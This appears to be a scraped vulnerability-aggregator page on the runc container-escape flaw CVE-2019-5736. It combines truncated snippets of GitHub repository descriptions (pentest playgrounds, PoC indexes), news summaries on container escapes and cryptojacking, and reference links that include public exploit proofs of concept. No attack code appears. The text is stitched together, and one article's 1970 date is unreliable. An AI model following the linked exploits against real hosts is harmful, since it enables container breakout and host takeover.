Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ASP ActionScript Arduino Assembly AutoHotkey Batchfile BitBake Boo C C# C++ CMake CSS CoffeeScript Dart Dockerfile Emacs Lisp Erlang F# Game Maker Language Go HCL HTML Haskell Java JavaScript Jupyter Notebook KiCad Kotlin Logos Lua M Makefile Markdown Mask Max Nginx Nim OCaml Objective-C Objecti

DevSecOps Kubernetes Playground (aka "A Hacker's Guide to Kubernetes") Based on Cloud-Native & Kubernetes Security HOWTO Prerequisite: Setup Pentest Infrastructure/Environment: Kubernetes kubeadm-based setup with terraform + ansible on ProxMox (pfSense VM as Firewall/VPN/LB + k8s nodes VMs) Objective: Kubernetes has historically not been security hardened

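Project overview Information gathering, attack attempts to gain access, persistent control, privilege escalation, network information gathering, lateral movement, data analysis (with further persistence built on top of it), covering tracks. List of security-related resources arxivorg Cornell University open documents githubcom/sindresorhus/awesome awesome series wwwowasporgcn/owasp-pr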

DevSecOps Kubernetes Playground ("A Hacker's Guide to Kubernetes") Based on Cloud-Native & Kubernetes Security HOWTO Tech Stack: Proxmox/pfSense/Ansible/Packer/Terraform/Kubernetes: kubeadm-based & KIND/Docker/etc Prerequisite: (DEFAULT DevSecOps ENV) Pentest Infrastructure/Environment (On-Prem Kubernetes Cluster): Kubernetes kubeadm-based setup

PoC in GitHub 2021 CVE-2021-1056 (2021-01-07) NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidiako) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure pokerfaceSad/CVE-2021-1056 CVE-2021-

Recent Articles

Rethinking Cyber-Defense Strategies in the Public-Cloud Age
Threatpost • Lisa Vaas • 19 Apr 2022

The pandemic has fast-tracked migration to the public cloud, including Amazon Web Services, Google Compute Platform and Microsoft Azure. But the journey hasn’t exactly been smooth as silk: The great migration has brought a raft of complex security challenges, which have led to headline-grabbing data exposures and more. Misconfigurations and a lack of visibility into cloud assets and inventory are the biggest culprits for public-cloud insecurity. Thankfully, there are approaches that can help. ...

Public Clouds & Shared Responsibility: Lessons from Vulnerability Disclosure
Threatpost • Oliver Tavakoli • 26 Oct 2021

The inexorable movement of data and applications to the cloud that began several years ago and accelerated during the pandemic shows no signs of slowing down. The rationale for this transformation is driven by a desire to outsource non-critical functions (building and maintaining data centers, running and patching standard software packages) and to achieve business agility (scaling up, the ability to rapidly shift focus in light of market conditions).
Some of this migration is to public cl...

Exposed Docker APIs Abused by DDoS, Cryptojacking Botnet Malware
BleepingComputer • Sergiu Gatlan • 14 Jun 2019

Attackers are actively scanning for exposed Docker APIs on port 2375 and use them to deploy a malicious payload which drops a Dofloo Trojan variant, a malware known as a popular tool for building large scale botnets.
The Dofloo (aka AESDDoS) malware was first [...] and it is known for allowing hackers to quickly assemble vast numbers of compromised machines used to create botnets that can launch DDoS attacks and — in the case of some variants —...

Compromised Docker Hosts Use Shodan to Infect More Victims
BleepingComputer • Sergiu Gatlan • 30 May 2019

Hackers are scanning for Docker hosts with exposed APIs to use them for cryptocurrency mining by deploying malicious self-propagating Docker images infected with Monero miners and scripts that make use of Shodan to find other vulnerable targets.
The cryptojacking campaign targeting exposed Docker hosts was unearthed by Trend Micro researchers after a Docker image containing a Monero (XMR) cryptocurrency miner binary was deployed on one of their honeypots.
This type of attack is defi...

Vulnerable Docker Hosts Actively Abused in Cryptojacking Campaigns
BleepingComputer • Sergiu Gatlan • 04 Mar 2019

Hundreds of vulnerable and exposed Docker hosts are being abused in cryptojacking campaigns after being compromised with the help of exploits designed to take advantage of the CVE-2019-5736 runc vulnerability discovered last month.
The [...] triggers a container escape and it allows potential attackers to access the host filesystem upon execution of a malicious container, overwrite the runc binary present on the system, and run arbitrary commands on the container's host system.
...

Major Container Security Flaw Threatens Cascading Attacks
Threatpost • Tara Seals • 12 Feb 2019

runc, a building-block project for the container technologies used by many enterprises as well as public cloud providers, has patched a vulnerability that would allow root-level code-execution, container escape and access to the host filesystem.
Discovered by researchers Adam Iwaniuk and Borys Popławski, the vulnerability (CVE-2019-5736) “allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host,”...

Patch this run(DM)c Docker flaw or you be illin'... Tricky containers can root host boxes. It's like that – and that's the way it is
The Register • Thomas Claburn in San Francisco • 11 Feb 2019

'Doomsday scenario' unless devops crowd walks this way

Aleksa Sarai, a senior software engineer at SUSE Linux GmbH, has disclosed a serious vulnerability affecting runc, the default container runtime for Docker, containerd, Podman, and CRI-O.
"While there are very few incidents that could qualify as a doomsday scenario for enterprise IT, a cascading set of exploits affecting a wide range of interconnected production systems qualifies...and that’s exactly what this vulnerability represents," said Scott McCarty, principal product manager for c...

RunC Vulnerability Gives Attackers Root Access on Docker, Kubernetes Hosts
BleepingComputer • Sergiu Gatlan • 11 Feb 2019

A container breakout security flaw found in the runc container runtime allows malicious containers (with minimal user interaction) to overwrite the host runc binary and gain root-level code execution on the host machine.
[...] is an open source command line utility designed to spawn and run containers and, at the moment, it is used as the default runtime for containers with Docker, containerd, Podman, and CRI-O.
According to Aleksa Sarai, Senior Software Engineer (Containers) SUSE Li...

Microsoft fixes bug letting hackers take over Azure containers
BleepingComputer • Ionut Ilascu • 01 Jan 1970

Microsoft has fixed a vulnerability in Azure Container Instances called Azurescape that allowed a malicious container to take over containers belonging to other customers on the platform.
An adversary exploiting Azurescape could execute commands in the other users' containers and gain access to all their data deployed to the platform, the researchers say.
Microsoft has notified customers that were potentially impacted by Azurescape to change privileged credentials for containers depl...

References

CWE-78
https://www.openwall.com/lists/oss-security/2019/02/11/2
https://github.com/opencontainers/runc/commit/6635b4f0c6af3810594d2770f662f34ddc15b40d
https://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b
https://github.com/docker/docker-ce/releases/tag/v18.09.2
https://access.redhat.com/security/vulnerabilities/runcescape
https://access.redhat.com/security/cve/cve-2019-5736
https://www.twistlock.com/2019/02/11/how-to-mitigate-cve-2019-5736-in-runc-and-docker/
https://github.com/rancher/runc-cve
https://cloud.google.com/kubernetes-engine/docs/security-bulletins#february-11-2019-runc
https://brauner.github.io/2019/02/12/privileged-containers.html
https://aws.amazon.com/security/security-bulletins/AWS-2019-002/
https://access.redhat.com/errata/RHSA-2019:0304
https://access.redhat.com/errata/RHSA-2019:0303
https://kubernetes.io/blog/2019/02/11/runc-and-cve-2019-5736/
https://www.exploit-db.com/exploits/46359/
http://www.securityfocus.com/bid/106976
https://www.exploit-db.com/exploits/46369/
https://github.com/q3k/cve-2019-5736-poc
https://github.com/Frichetten/CVE-2019-5736-PoC
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190215-runc
https://www.synology.com/security/advisory/Synology_SA_19_06
https://access.redhat.com/errata/RHSA-2019:0401
https://access.redhat.com/errata/RHSA-2019:0408
https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbhf03913en_us
https://security.netapp.com/advisory/ntap-20190307-0008/
https://lists.apache.org/thread.html/b162dd624dc088cd634292f0402282a1d1d0ce853baeae8205bc033c@%3Cdev.mesos.apache.org%3E
https://lists.apache.org/thread.html/a258757af84c5074dc7bf932622020fd4f60cef65a84290380386706@%3Cuser.mesos.apache.org%3E
http://www.openwall.com/lists/oss-security/2019/03/23/1
https://bugzilla.suse.com/show_bug.cgi?id=1121967
https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html
https://support.mesosphere.com/s/article/Known-Issue-Container-Runtime-Vulnerability-MSPH-2019-0003
http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00044.html
http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00074.html
http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00091.html
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6A4OSFM5GGOWW4ECELV5OHX2XRAUSPH/
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SWFJGIPYAAAMVSWWI3QWYXGA3ZBU2H4W/
https://softwaresupport.softwaregrp.com/document/-/facetsearch/document/KM03410944
https://access.redhat.com/errata/RHSA-2019:0975
https://azure.microsoft.com/en-us/updates/iot-edge-fix-cve-2019-5736/
https://azure.microsoft.com/en-us/updates/cve-2019-5736-and-runc-vulnerability/
https://lists.apache.org/thread.html/acacf018c12636e41667e94ac0a1e9244e887eef2debdd474640aa6e@%3Cdev.dlab.apache.org%3E
https://lists.apache.org/thread.html/a585f64d14c31ab393b90c5f17e41d9765a1a17eec63856ce750af46@%3Cdev.dlab.apache.org%3E
http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00060.html
http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00073.html
http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00011.html
http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00015.html
http://www.openwall.com/lists/oss-security/2019/06/28/2
http://www.openwall.com/lists/oss-security/2019/07/06/4
http://www.openwall.com/lists/oss-security/2019/07/06/3
https://usn.ubuntu.com/4048-1/
http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00084.html
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLC52IOJN6IQJWJ6CUI6AIUP6GVVG2QP/
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EGZKRCKI3Y7FMADO2MENMT4TU24QGHFR/
https://lists.apache.org/thread.html/24e54e3c6b2259e3903b6b8fe26896ac649c481ea99c5739468c92a3@%3Cdev.dlab.apache.org%3E
http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00007.html
http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00029.html
http://www.openwall.com/lists/oss-security/2019/10/24/1
http://www.openwall.com/lists/oss-security/2019/10/29/3
https://security.gentoo.org/glsa/202003-21
https://lists.apache.org/thread.html/rc494623986d76593873ce5a40dd69cb3629400d10750d5d7e96b8587@%3Cdev.dlab.apache.org%3E
https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E
http://packetstormsecurity.com/files/163339/Docker-Container-Escape.html
http://packetstormsecurity.com/files/165197/Docker-runc-Command-Execution-Proof-Of-Concept.html
https://access.redhat.com/errata/RHSA-2019:0304
https://tools.cisco.com/security/center/viewAlert.x?alertId=59636
https://usn.ubuntu.com/4048-1/
https://www.exploit-db.com/exploits/46369
https://nvd.nist.gov
https://www.securityfocus.com/bid/106976